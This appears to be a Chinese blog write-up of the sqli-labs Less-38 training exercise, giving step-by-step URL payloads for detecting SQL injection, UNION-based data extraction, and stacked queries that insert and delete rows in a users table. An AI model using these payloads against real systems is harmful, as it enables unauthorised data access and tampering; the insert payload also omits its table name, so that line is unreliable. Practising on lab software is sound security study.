sql_lab之sqli中的堆叠型注入(less-38)

爱喝水的泡泡2023-12-27 12:43

堆叠注入(less-38)

1.判断注入类型

http://127.0.0.3/less-38/?id=1' and 1=2 -- s 没有回显

http://127.0.0.3/less-38/?id=1' and 1=1 -- s 有回显

则说明是单字节'注入

2.查询字段数

http://127.0.0.3/less-38/?id=1' order by 4 -- s 报错

http://127.0.0.3/less-38/?id=1' order by 3 -- s 有回显

说明字段数为3

3.判断回显点

http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s

4.查询数据库

http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s

接下来的步骤可以用联合查询进行查询

堆叠注入攻击

(1)在users表中添加一个用户

http://127.0.0.3/less-38/?id=1'; insert into values(17,'gao','a123456') -- s

证明添加成功

(2)在users表中删除一个用户

http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' -- s

表中没有gao这个用户,说明删除成功

相关推荐
DFT计算杂谈5 分钟前
Abinit-10.4.7安装教程
linux·数据库·python·算法·matlab
KKKlucifer5 分钟前
数据分类分级为基的跨域流通权限动态管控技术:构建安全可控的跨域数据流通体系
大数据·数据库·人工智能
我科绝伦(Huanhuan Zhou)19 分钟前
MySQL运维必备:24个核心监控参数(含查询语句+异常处理)
运维·数据库·mysql
p***976125 分钟前
PostgreSQL的备份方式
数据库·postgresql
s***411338 分钟前
MySQL——表的约束
数据库·mysql
Fᴏʀ ʏ꯭ᴏ꯭ᴜ꯭.38 分钟前
MySQL双主双活集群-Keepalived高可用 Prometheus/Grafana监控
数据库·mysql
yeshihouhou43 分钟前
redis主从复制
数据库·redis·缓存
e***753944 分钟前
MySQL错误-this is incompatible with sql_mode=only_full_group_by完美解决方案
android·sql·mysql
Blossom.1181 小时前
基于知识图谱+LLM的工业设备故障诊断:从SQL日志到可解释推理的实战闭环
人工智能·python·sql·深度学习·算法·transformer·知识图谱
x***01061 小时前
Mysql之主从复制
android·数据库·mysql
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)0846个Nano-banana 精选提示词,持续更新中09全球最强模型Grok4,国内已可免费使用!(附教程)10Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽